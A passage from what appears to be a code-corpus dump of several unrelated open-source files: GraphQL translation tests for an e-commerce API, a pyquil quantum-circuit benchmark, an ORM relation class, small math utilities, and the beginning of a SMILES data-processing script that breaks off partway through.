query, {"kind": kind.name}, permissions=[permission_manage_translations]
)
data = get_graphql_content(response)["data"]["translations"]
assert data["edges"][0]["node"]["__typename"] == expected_typename
assert data["totalCount"] > 0
def test_translations_query_inline_fragment(
staff_api_client, permission_manage_translations, product
):
product.translations.create(language_code="pl", name="Produkt testowy")
query = """
{
translations(kind: PRODUCT, first: 1) {
edges {
node {
... on ProductTranslatableContent {
name
translation(languageCode: PL) {
name
}
}
}
}
}
}
"""
response = staff_api_client.post_graphql(
query, permissions=[permission_manage_translations]
)
data = get_graphql_content(response)["data"]["translations"]["edges"][0]
assert data["node"]["name"] == "Test product"
assert data["node"]["translation"]["name"] == "Produkt testowy"
QUERY_TRANSLATION_PRODUCT = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on ProductTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_product(
staff_api_client,
permission_manage_translations,
product,
product_translation_fr,
):
product_id = graphene.Node.to_global_id("Product", product.id)
variables = {
"id": product_id,
"kind": TranslatableKinds.PRODUCT.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_PRODUCT,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == product.name
assert data["translation"]["name"] == product_translation_fr.name
QUERY_TRANSLATION_COLLECTION = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on CollectionTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_collection(
staff_api_client,
published_collection,
collection_translation_fr,
permission_manage_translations,
channel_USD,
):
channel_listing = published_collection.channel_listings.get()
channel_listing.save()
collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
variables = {
"id": collection_id,
"kind": TranslatableKinds.COLLECTION.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_COLLECTION,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == published_collection.name
assert data["translation"]["name"] == collection_translation_fr.name
QUERY_TRANSLATION_CATEGORY = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on CategoryTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_category(
staff_api_client, category, category_translation_fr, permission_manage_translations
):
category_id = graphene.Node.to_global_id("Category", category.id)
variables = {
"id": category_id,
"kind": TranslatableKinds.CATEGORY.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_CATEGORY,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == category.name
assert data["translation"]["name"] == category_translation_fr.name
QUERY_TRANSLATION_ATTRIBUTE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on AttributeTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_attribute(
staff_api_client, translated_attribute, permission_manage_translations
):
attribute = translated_attribute.attribute
attribute_id = graphene.Node.to_global_id("Attribute", attribute.id)
variables = {
"id": attribute_id,
"kind": TranslatableKinds.ATTRIBUTE.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_ATTRIBUTE,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == attribute.name
assert data["translation"]["name"] == translated_attribute.name
QUERY_TRANSLATION_ATTRIBUTE_VALUE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on AttributeValueTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_attribute_value(
staff_api_client,
pink_attribute_value,
translated_attribute_value,
permission_manage_translations,
):
attribute_value_id = graphene.Node.to_global_id(
"AttributeValue", pink_attribute_value.id
)
variables = {
"id": attribute_value_id,
"kind": TranslatableKinds.ATTRIBUTE_VALUE.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_ATTRIBUTE_VALUE,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == pink_attribute_value.name
assert data["translation"]["name"] == translated_attribute_value.name
QUERY_TRANSLATION_VARIANT = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on ProductVariantTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_variant(
staff_api_client,
permission_manage_translations,
product,
variant,
variant_translation_fr,
):
variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
variables = {
"id": variant_id,
"kind": TranslatableKinds.VARIANT.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_VARIANT,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == variant.name
assert data["translation"]["name"] == variant_translation_fr.name
QUERY_TRANSLATION_PAGE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on PageTranslatableContent{
id
title
translation(languageCode: $languageCode){
title
}
}
}
}
"""
@pytest.mark.parametrize(
"is_published, perm_codenames",
[
(True, ["manage_translations"]),
(False, ["manage_translations"]),
(False, ["manage_translations", "manage_pages"]),
],
)
def test_translation_query_page(
staff_api_client,
page,
page_translation_fr,
is_published,
perm_codenames,
):
page.is_published = is_published
page.save()
page_id = graphene.Node.to_global_id("Page", page.id)
perms = list(Permission.objects.filter(codename__in=perm_codenames))
variables = {
"id": page_id,
"kind": TranslatableKinds.PAGE.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_PAGE, variables, permissions=perms
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["title"] == page.title
assert data["translation"]["title"] == page_translation_fr.title
QUERY_TRANSLATION_SHIPPING_METHOD = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on ShippingMethodTranslatableContent{
id
name
description
translation(languageCode: $languageCode){
name
}
}
}
}
"""
@pytest.mark.parametrize(
"perm_codenames, return_shipping_method",
[
(["manage_translations"], False),
(["manage_translations", "manage_shipping"], True),
],
)
def test_translation_query_shipping_method(
staff_api_client,
shipping_method,
shipping_method_translation_fr,
perm_codenames,
return_shipping_method,
):
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethodType", shipping_method.id
)
perms = list(Permission.objects.filter(codename__in=perm_codenames))
variables = {
"id": shipping_method_id,
"kind": TranslatableKinds.SHIPPING_METHOD.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_SHIPPING_METHOD, variables, permissions=perms
)
content = get_graphql_content(response, ignore_errors=True)
data = content["data"]["translation"]
assert data["name"] == shipping_method.name
assert data["description"] == shipping_method.description
assert data["translation"]["name"] == shipping_method_translation_fr.name
QUERY_TRANSLATION_SALE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on SaleTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
@pytest.mark.parametrize(
"perm_codenames, return_sale",
[
(["manage_translations"], False),
(["manage_translations", "manage_discounts"], True),
],
)
def test_translation_query_sale(
staff_api_client, sale, sale_translation_fr, perm_codenames, return_sale
):
sale_id = graphene.Node.to_global_id("Sale", sale.id)
perms = list(Permission.objects.filter(codename__in=perm_codenames))
variables = {
"id": sale_id,
"kind": TranslatableKinds.SALE.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_SALE, variables, permissions=perms
)
content = get_graphql_content(response, ignore_errors=True)
data = content["data"]["translation"]
assert data["name"] == sale.name
assert data["translation"]["name"] == sale_translation_fr.name
QUERY_TRANSLATION_VOUCHER = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on VoucherTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
@pytest.mark.parametrize(
"perm_codenames, return_voucher",
[
(["manage_translations"], False),
(["manage_translations", "manage_discounts"], True),
],
)
def test_translation_query_voucher(
staff_api_client, voucher, voucher_translation_fr, perm_codenames, return_voucher
):
voucher_id = graphene.Node.to_global_id("Voucher", voucher.id)
perms = list(Permission.objects.filter(codename__in=perm_codenames))
variables = {
"id": voucher_id,
"kind": TranslatableKinds.VOUCHER.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_VOUCHER, variables, permissions=perms
)
content = get_graphql_content(response, ignore_errors=True)
data = content["data"]["translation"]
assert data["name"] == voucher.name
assert data["translation"]["name"] == voucher_translation_fr.name
QUERY_TRANSLATION_MENU_ITEM = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on MenuItemTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_menu_item(
staff_api_client,
menu_item,
menu_item_translation_fr,
permission_manage_translations,
):
menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
variables = {
"id": menu_item_id,
"kind": TranslatableKinds.MENU_ITEM.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_MENU_ITEM,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
data = content["data"]["translation"]
assert data["name"] == menu_item.name
assert data["translation"]["name"] == menu_item_translation_fr.name
def test_translation_query_incorrect_kind(
staff_api_client, menu_item, permission_manage_translations
):
menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
variables = {
"id": menu_item_id,
"kind": TranslatableKinds.PRODUCT.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(
QUERY_TRANSLATION_MENU_ITEM,
variables,
permissions=[permission_manage_translations],
)
content = get_graphql_content(response)
assert not content["data"]["translation"]
def test_translation_query_no_permission(staff_api_client, menu_item):
menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
variables = {
"id": menu_item_id,
"kind": TranslatableKinds.MENU_ITEM.name,
"languageCode": LanguageCodeEnum.FR.name,
}
response = staff_api_client.post_graphql(QUERY_TRANSLATION_MENU_ITEM, variables)
assert_no_permission(response)
def test_product_and_attribute_translation(user_api_client, product, channel_USD):
description = dummy_editorjs("test desription")
product.translations.create(
language_code="pl", name="Produkt", description=description
)
assigned_attribute = product.attributes.first()
attribute = assigned_attribute.attribute
attribute.translations.create(language_code="pl", name="Kolor")
query = """
query productById($productId: ID!, $channel: String) {
product(id: $productId, channel: $channel) {
translation(languageCode: PL) {
name
description
descriptionJson
language {
code
}
}
attributes{
attribute{
translation(languageCode: PL){
id
name
language{
code
}
}
}
}
}
}
"""
product_id = graphene.Node.to_global_id("Product", product.id)
response = user_api_client.post_graphql(
query, {"productId": product_id, "channel": channel_USD.slug}
)
data = get_graphql_content(response)["data"]
product_translation_data = data["product"]["translation"]
assert product_translation_data["name"] == "Produkt"
assert product_translation_data["language"]["code"] == "PL"
assert (
product_translation_data["description"]
== product_translation_data["descriptionJson"]
== dummy_editorjs("test desription", json_format=True)
)
attribute_translation_data = data["product"]["attributes"][0]["attribute"][
"translation"
]
assert attribute_translation_data["name"] == "Kolor"
assert attribute_translation_data["language"]["code"] == "PL"
def test_product_attribute_value_rich_text_translation(
staff_api_client,
product_with_rich_text_attribute,
permission_manage_translations,
):
rich_text = dummy_editorjs("Test_dummy_data")
assigned_attribute = product_with_rich_text_attribute[0].attributes.first()
attribute_value = assigned_attribute.attribute.values.first()
attribute_value.translations.create(language_code="pl", rich_text=rich_text)
product_id = graphene.Node.to_global_id(
"Product", product_with_rich_text_attribute[0].id
)
query = """
query translation(
$kind: TranslatableKinds!
$id: ID!
$languageCode: LanguageCodeEnum!
) {
translation(kind: $kind, id: $id) {
... on ProductTranslatableContent {
name
attributeValues {
name
richText
translation(languageCode: $languageCode) {
name
richText
}
}
}
}
}
"""
variables = {
"id": product_id,
"kind": TranslatableKinds.PRODUCT.name,
"languageCode": LanguageCodeEnum.PL.name,
}
response = staff_api_client.post_graphql(
query, variables, permissions=[permission_manage_translations]
)
data = get_graphql_content(response)["data"]
attribute_value_response = data["translation"]["attributeValues"][0]
assert attribute_value_response["name"] == attribute_value.name
assert attribute_value_response["richText"] == json.dumps(attribute_value.rich_text)
assert attribute_value_response["translation"]["richText"] == json.dumps(rich_text)
def test_product_variant_attribute_value_rich_text_translation(
staff_api_client,
product_with_rich_text_attribute,
permission_manage_translations,
product_type_with_rich_text_attribute,
):
rich_text = dummy_editorjs("Test_dummy_data")
variant_attr = product_type_with_rich_text_attribute.variant_attributes.first()
attribute_value = variant_attr.values.first()
attribute_value.translations.create(language_code="pl", rich_text=rich_text)
variant_id = graphene.Node.to_global_id(
"ProductVariant", product_with_rich_text_attribute[1].id
)
query = """
query translation(
$kind: TranslatableKinds!
$id: ID!
$languageCode: LanguageCodeEnum!
) {
translation(kind: $kind, id: $id) {
... on ProductVariantTranslatableContent {
name
attributeValues {
name
richText
translation(languageCode: $languageCode) {
name
richText
}
}
}
}
}
"""
variables = {
"id": variant_id,
"kind": TranslatableKinds.VARIANT.name,
"languageCode": LanguageCodeEnum.PL.name,
}
response = staff_api_client.post_graphql(
query, variables, permissions=[permission_manage_translations]
)
data = get_graphql_content(response)["data"]
translations_response = data["translation"]["attributeValues"][0]
assert translations_response["name"] == attribute_value.name
assert translations_response["richText"] == json.dumps(attribute_value.rich_text)
assert translations_response["translation"]["richText"] == json.dumps(rich_text)
def test_page_attribute_value_rich_text_translation(
staff_api_client,
page_with_rich_text_attribute,
permission_manage_translations,
page_type_with_rich_text_attribute,
permission_manage_pages,
):
rich_text = dummy_editorjs("Test_dummy_data")
variant_attr = page_type_with_rich_text_attribute.page_attributes.first()
attribute_value = variant_attr.values.first()
attribute_value.translations.create(language_code="pl", rich_text=rich_text)
page_id = graphene.Node.to_global_id("Page", page_with_rich_text_attribute.id)
query = """
query translation(
$kind: TranslatableKinds!
$id: ID!
$languageCode: LanguageCodeEnum!
) {
translation(kind: $kind, id: $id) {
... on PageTranslatableContent {
attributeValues {
name
richText
translation(languageCode: $languageCode) {
name
richText
}
}
}
}
}
"""
variables = {
"id": page_id,
"kind": TranslatableKinds.PAGE.name,
"languageCode": LanguageCodeEnum.PL.name,
}
response = staff_api_client.post_graphql(
query, variables, permissions=[permission_manage_translations]
)
data = get_graphql_content(response)["data"]
attribute_value_response = data["translation"]["attributeValues"][0]
assert attribute_value_response["name"] == attribute_value.name
assert attribute_value_response["richText"] == json.dumps(attribute_value.rich_text)
assert attribute_value_response["translation"]["richText"] == json.dumps(rich_text)
| 32.627559 | 88 | 0.646596 |
3ba86633bd3a0dd66fca80cd0d8353322c960d3b | 2,436 | py | Python | benchmark/startPyquil1752.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startPyquil1752.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startPyquil1752.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=5
# total number=60
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=3
prog += CNOT(0,4) # number=57
prog += X(4) # number=58
prog += CNOT(0,4) # number=59
prog += CNOT(2,0) # number=45
prog += Z(2) # number=46
prog += H(0) # number=54
prog += CZ(2,0) # number=55
prog += H(0) # number=56
prog += H(1) # number=4
prog += RX(2.664070570244145,1) # number=39
prog += H(2) # number=5
prog += H(3) # number=6
prog += H(2) # number=49
prog += CZ(3,2) # number=50
prog += H(2) # number=51
prog += H(4) # number=21
prog += H(0) # number=1
prog += H(3) # number=40
prog += Y(4) # number=35
prog += H(1) # number=2
prog += H(2) # number=7
prog += H(3) # number=8
prog += H(0) # number=25
prog += CZ(1,0) # number=26
prog += H(0) # number=27
prog += H(0) # number=36
prog += CZ(1,0) # number=37
prog += H(0) # number=38
prog += CNOT(1,0) # number=41
prog += X(0) # number=42
prog += CNOT(1,0) # number=43
prog += CNOT(1,0) # number=34
prog += CNOT(1,0) # number=24
prog += CNOT(0,1) # number=29
prog += CNOT(2,3) # number=44
prog += X(1) # number=30
prog += CNOT(0,1) # number=31
prog += X(2) # number=11
prog += X(3) # number=12
prog += X(0) # number=13
prog += X(1) # number=14
prog += X(2) # number=15
prog += X(3) # number=16
prog += H(0) # number=17
prog += H(1) # number=18
prog += H(2) # number=19
prog += H(3) # number=20
prog += Z(1) # number=52
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('5q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1752.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| 25.642105 | 64 | 0.539819 |
54f104c59f65d8f93a0d0b1bdbc169f3ead79c9a | 5,841 | py | Python | orator/orm/relations/relation.py | HeathLee/sorator | 271668865bf0d039908643e3df9b98c966b9d956 | [
"MIT"
] | null | null | null | orator/orm/relations/relation.py | HeathLee/sorator | 271668865bf0d039908643e3df9b98c966b9d956 | [
"MIT"
] | null | null | null | orator/orm/relations/relation.py | HeathLee/sorator | 271668865bf0d039908643e3df9b98c966b9d956 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from contextlib import contextmanager
from ...query.expression import QueryExpression
from ..builder import Builder
class Relation:
_constraints = True
def __init__(self, query, parent):
"""
:param query: A Builder instance
:type query: orm.orator.Builder
:param parent: The parent model
:type parent: Model
"""
self._query = query
self._parent = parent
self._related = query.get_model()
self._extra_query = None
self.add_constraints()
def add_constraints(self):
"""
Set the base constraints on the relation query.
:rtype: None
"""
raise NotImplementedError
def add_eager_constraints(self, models):
"""
Set the constraints for an eager load of the relation.
:type models: list
"""
raise NotImplementedError
def init_relation(self, models, relation):
"""
Initialize the relation on a set of models.
:type models: list
:type relation: str
"""
raise NotImplementedError
def match(self, models, results, relation):
"""
Match the eagerly loaded results to their parents.
:type models: list
:type results: Collection
:type relation: str
"""
raise NotImplementedError
def get_results(self):
"""
Get the results of the relationship.
"""
raise NotImplementedError
def get_eager(self):
"""
Get the relationship for eager loading.
:rtype: Collection
"""
return self.get()
def touch(self):
"""
Touch all of the related models for the relationship.
"""
column = self.get_related().get_updated_at_column()
self.raw_update({column: self.get_related().fresh_timestamp()})
def raw_update(self, attributes=None):
"""
Run a raw update against the base query.
:type attributes: dict
:rtype: int
"""
if attributes is None:
attributes = {}
if self._query is not None:
return self._query.update(attributes)
def get_relation_count_query(self, query, parent):
"""
Add the constraints for a relationship count query.
:type query: Builder
:type parent: Builder
:rtype: Builder
"""
query.select(QueryExpression('COUNT(*)'))
key = self.wrap(self.get_qualified_parent_key_name())
return query.where(self.get_has_compare_key(),
'=', QueryExpression(key))
@classmethod
@contextmanager
def no_constraints(cls, with_subclasses=False):
"""
Runs a callback with constraints disabled on the relation.
"""
cls._constraints = False
if with_subclasses:
for klass in cls.__subclasses__():
klass._constraints = False
try:
yield cls
except Exception:
raise
finally:
cls._constraints = True
if with_subclasses:
for klass in cls.__subclasses__():
klass._constraints = True
def get_keys(self, models, key=None):
"""
Get all the primary keys for an array of models.
:type models: list
:type key: str
:rtype: list
"""
return list(set(map(lambda value: value.get_attribute(
key) if key else value.get_key(), models)))
def get_query(self):
return self._query
def get_base_query(self):
return self._query.get_query()
def merge_query(self, query):
if isinstance(query, Builder):
query = query.get_query()
self._query.merge(query)
def get_parent(self):
return self._parent
def get_qualified_parent_key_name(self):
return self._parent.get_qualified_key_name()
def get_related(self):
return self._related
def created_at(self):
"""
Get the name of the "created at" column.
:rtype: str
"""
return self._parent.get_created_at_column()
def updated_at(self):
"""
Get the name of the "updated at" column.
:rtype: str
"""
return self._parent.get_updated_at_column()
def get_related_updated_at(self):
"""
Get the name of the related model's "updated at" column.
:rtype: str
"""
return self._related.get_updated_at_column()
def wrap(self, value):
"""
Wrap the given value with the parent's query grammar.
:rtype: str
"""
return self._parent.new_query().get_query().get_grammar().wrap(value)
def set_parent(self, parent):
self._parent = parent
def set_extra_query(self, query):
self._extra_query = query
def new_query(self, related=None):
if related is None:
related = self._related
query = related.new_query()
if self._extra_query:
query.merge(self._extra_query.get_query())
return query
def new_instance(self, model, **kwargs):
new = self._new_instance(model, **kwargs)
if self._extra_query:
new.set_extra_query(self._extra_query)
return new
def __dynamic(self, method):
attribute = getattr(self._query, method)
def call(*args, **kwargs):
result = attribute(*args, **kwargs)
if result is self._query:
return self
return result
if not callable(attribute):
return attribute
return call
def __getattr__(self, item):
return self.__dynamic(item)
| 23.938525 | 77 | 0.578497 |
a237f9ae9d2bbe3d179366ec39e9c1e570b8d068 | 4,983 | py | Python | PyMathTools.py | iblacksand/PyMathTools | b558ec2dbcd901be2614fa768cc3894da18f9b7d | [
"BSD-3-Clause"
] | null | null | null | PyMathTools.py | iblacksand/PyMathTools | b558ec2dbcd901be2614fa768cc3894da18f9b7d | [
"BSD-3-Clause"
] | null | null | null | PyMathTools.py | iblacksand/PyMathTools | b558ec2dbcd901be2614fa768cc3894da18f9b7d | [
"BSD-3-Clause"
] | null | null | null | # PyMathTools by John Elizarraras
# This is free and please make any changes you want no need for credit
from math import gcd
__all__ = ['binary_search', 'mod', 'to_ints', 'read_file', 'latex_gen_graph', 'elliptic_card', 'is_prime']
def binary_search(array, target):
""" Does a binary search on to find the index of an element in an array. WARNING - ARRAY HAS TO BE SORTED
Keyword arguments:
array - the array that contains the target
target - the target element for which its index will be returned
returns the index of target in array
"""
lower = 0
upper = len(array)
while lower < upper:
x = lower + (upper - lower) // 2
val = array[x]
if target == val:
return x
elif target > val:
if lower == x:
break
lower = x
elif target < val:
upper = x
def mod(n, modulus):
''' A safer mod funtion instead of %, where fractions are acurately calculated
Keyword arguments:
n - the number to take modulo by
modulus - the modulus
returns n mod modulus
'''
if not(float(modulus).is_integer()):
raise ValueError('Modulus is not an integer')
elif float(n).is_integer():
return n % modulus
else:
if float(1/n).is_integer():
if gcd(int(1/n), int(modulus)) != 1:
raise ValueError('Inverse of n is not coprime with modulus')
n = int(1/n)
i = 1
while (n * i) % modulus != 1:
i = i + 1
return i
else:
raise ValueError('Inverse of n is not an integer and n is a fraction')
def to_ints(array):
''' converts everything in an array into ints
Keyword arguments
array - the array containing the ints
returns an array with the conveted ints
'''
for i in range(len(array)):
array[i] = int(array[i])
return array
def read_file(f):
''' reads a file and converts the file into an array of floats. It seperates numbers by spaces and will go through all the lines. You can use the to_ints function to convert it.
Keyword arguments:
f - the path/name of the file
returns an array of floats
'''
r = open(f, "r")
s = str(r.readline())
a = []
while s != "":
s = s.strip().split(" ")
for i in s:
a.append(float(i))
s = str(r.readline())
return a
def latex_gen_graph(array, title, xaxis, yaxis, xmin, ymin, xmax, ymax):
''' generates a tikz graph with the provided points
----
if there are too many points(out of memory) try using 'pdflatex --enable-write18 --extra-mem-bot=10000000 --synctex=1 <filename>' to make it compile
---
Keyword arguments:
array - A 2d array where the first column is the x value and the second is the y
title(str) - the title of the graph. This will also be the title of the produced tex file
xaxis(str) - the label for the x axis
yaxis(str) - the label for the x axis
xmin - the min x value on the x axis
ymin - the min y value on the y axis
xmax - the max x value on the x axis
ymax - the max y value on y axis
'''
w = open(title + ".tex", "w+")
w.write("\\documentclass{amsart}\n\\usepackage{pgfplots}\n\\begin{document}\n\\begin{tikzpicture}\n\\begin{axis}[\ntitle = {"+ title + "},\nxlabel={"+ xaxis +"},\nylabel={" + yaxis + "},\nxmin = " + str(xmin) + ", xmax=" + str(xmax) + ",\n")
w.write("ymin=" + str(ymin) + ", ymax=" + str(ymax) + ",\nlegend pos=north west,\nymajorgrids=true,\ngrid style=dashed,\n]\n\n")
w.write("\\addplot[\ncolor=blue,\nmark=square,\n]\ncoordinates {\n")
for i in range(len(array)):
w.write("(" + str(array[i][0]) + "," + str(array[i][1]) + ")")
w.write("\n};\n\n")
w.write("\end{axis}\n\end{tikzpicture}\n\end{document}")
def elliptic_card(a,b,m):
''' Gets the cardinality(number of solutions) on an elliptic curve. Follows form y^2 = x^3 + ax + b mod m. Counts the point at infinity
Keyword arguments:
a - the a value in the formula
b - the b value in the formula
returns an int of the cardinality of the function
'''
x = []
y = []
card = 1
for i in range(m):
y.append(mod(i**2, m))
for i in range(m):
x.append(mod((i**3 + a*i + b), m))
for i in range(len(x)):
for j in range(len(y)):
if x[i] == y[j]:
card = card + 1
return card
def is_prime(n):
""" Checks if a number is prime.
Keyword arguments:
n - the possible prime to check
returns true if n is prime but false if not.
"""
if n == 2:
return True
if n == 3:
return True
if n % 2 == 0:
return False
if n % 3 == 0:
return False
i = 5
w = 2
while i * i <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
| 32.357143 | 245 | 0.575356 |
199ec010875f322a39dbe0156e762257625b09ce | 13,288 | py | Python | zairachem/tools/mollib/virtual_libraries/experiments/do_data_processing.py | ersilia-os/ersilia-automl-chem | fabb1f05d17cff11ec0e084495eed4c0152f2f63 | [
"MIT"
] | 44 | 2019-11-08T09:45:34.000Z | 2022-03-14T12:14:23.000Z | zairachem/tools/mollib/virtual_libraries/experiments/do_data_processing.py | ersilia-os/ersilia-automl-chem | fabb1f05d17cff11ec0e084495eed4c0152f2f63 | [
"MIT"
] | 2 | 2020-06-08T04:49:12.000Z | 2021-04-16T08:17:53.000Z | zairachem/tools/mollib/virtual_libraries/experiments/do_data_processing.py | ersilia-os/ersilia-automl-chem | fabb1f05d17cff11ec0e084495eed4c0152f2f63 | [
"MIT"
] | 22 | 2019-11-08T18:53:01.000Z | 2022-02-19T11:00:36.000Z | # Copyright (c) 2019 ETH Zurich
import os, sys
import argparse
import configparser
import time
import re
import numpy as np
import random
import collections
from random import shuffle
from rdkit import Chem
from rdkit.Chem import Draw
sys.path.append('../src/')
from python import helper as hp
from python import helper_chem as hp_chem
from python import fixed_parameters as FP
parser = argparse.ArgumentParser(description='Run data processing')
parser.add_argument('-fn','--filename', type=str, help='Path to the fine-tuning txt file', required=True)
parser.add_argument('-v','--verbose', type=bool, help='Verbose', required=True)
def load_data(data_path, min_len, max_len, verbose=False):
"""
Function to load a .txt file of SMILES,
prune SMILES by length and check that they
are convertible to RDKit mol format.
Parameters:
- data_path (string): path to the dataset.
- min_len (int): minimum length of SMILES to be kept in the dataset.
- max_len (int): maximum length of SMILES to be kept in the dataset.
return:
data -> a list with SMILES in string format
data_rdkit -> a list with molecules in RDKit mol format
"""
data = []
data_rdkit = []
with open(data_path) as f:
for line in f:
newline = line.rstrip('\r\n')
if len(newline)<=max_len and len(newline)>=min_len:
# convert to RDKit mol format
mol = Chem.MolFromSmiles(newline)
if mol is not None:
data.append(newline)
data_rdkit.append(mol)
if verbose: print(f'Size of the dataset after pruning by length and check with RDKit: {len(data)}')
return data, data_rdkit
def randomSmiles(mol):
mol.SetProp("_canonicalRankingNumbers", "True")
idxs = list(range(0,mol.GetNumAtoms()))
random.shuffle(idxs)
for i,v in enumerate(idxs):
mol.GetAtomWithIdx(i).SetProp("_canonicalRankingNumber", str(v))
return Chem.MolToSmiles(mol)
def smile_augmentation(smile, augmentation, min_len, max_len):
mol = Chem.MolFromSmiles(smile)
s = set()
for i in range(1000):
smiles = randomSmiles(mol)
if len(smiles)<=max_len:
s.add(smiles)
if len(s)==augmentation:
break
return list(s)
def augment_dataset(data_ori, augmentation, min_len, max_len, verbose=False):
"""
Function to augment a dataset.
Parameters:
- data_ori (list): list of SMILES string to augment.
- augmentation (int): number of alternative SMILES to create.
- min_len (int): minimum length of alternative SMILES.
- max_len (int): maximum length of alternative SMILES.
return: a list alternative SMILES representations of data_ori
"""
all_alternative_smi = []
for i,x in enumerate(data_ori):
alternative_smi = smile_augmentation(x, augmentation, min_len, max_len)
all_alternative_smi.extend(alternative_smi)
if verbose and i%50000:
print(f'augmentation is at step {i}')
if verbose:
print('data augmentation done; number of new SMILES: {len(n_new)}')
return all_alternative_smi
def do_data_analysis(data_rdkit, descriptor_name, save_dir, verbose=False):
"""
Function to analize a dataset. Will compute: descritpor as specify in
descriptors_name, Morgan fingerprint, Murcko and generic scaffolds.
Parameters:
- data_rdkit: list of RDKit mol.
- descriptor_name (string): contain name of descriptor to compute.
- save_dir (string): Path to save the output of the analysis.
"""
